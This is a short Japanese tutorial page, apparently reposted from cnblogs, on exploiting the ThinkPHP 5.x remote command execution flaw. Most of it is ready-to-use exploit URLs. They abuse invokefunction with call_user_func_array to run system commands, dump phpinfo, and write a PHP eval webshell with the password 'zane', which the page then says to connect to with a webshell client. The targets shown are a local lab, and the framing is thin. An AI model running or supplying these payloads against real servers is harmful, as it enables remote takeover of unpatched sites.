ホームページ > PHPフレームワーク > ThinkPHP > ThinkPHP の脆弱性悪用について

ThinkPHP の脆弱性悪用について

藏色散人
リリース: 2020-08-31 13:37:53
転載
3045 人が閲覧しました

以下は、ThinkPHP の脆弱性悪用について紹介する thinkphp フレームワーク チュートリアルのコラムです。困っている友人の役に立てば幸いです。

ThinkPHP の脆弱性悪用について

#thinkphp_5x_Command 実行の脆弱性

影響を受けるバージョンには 5.0 および 5.1 バージョンが含まれます

Docker 脆弱性環境のソース コード:


https://github.com/vulnspy/thinkphp-5.1.29ローカル環境のセットアップ:
thinkphp5.0.15 php5.6n apache2。 0

http://www.thinkphp.cn/donate/download/id/1125.html

システム関数を使用してリモート コマンドを実行します

EXP


http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

phpinfo 関数を使用して phpinfo() 情報を書き込みます

EXP:


http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index .php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

シェルを書く

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
ログイン後にコピー

包丁を使って接続する

`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php パスワードは zane

http://127.0.0.1/middleware/thinkphp_5.0.15 _full/test.php パスワードは zane

`
です

以上がThinkPHP の脆弱性悪用についての詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:cnblogs.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート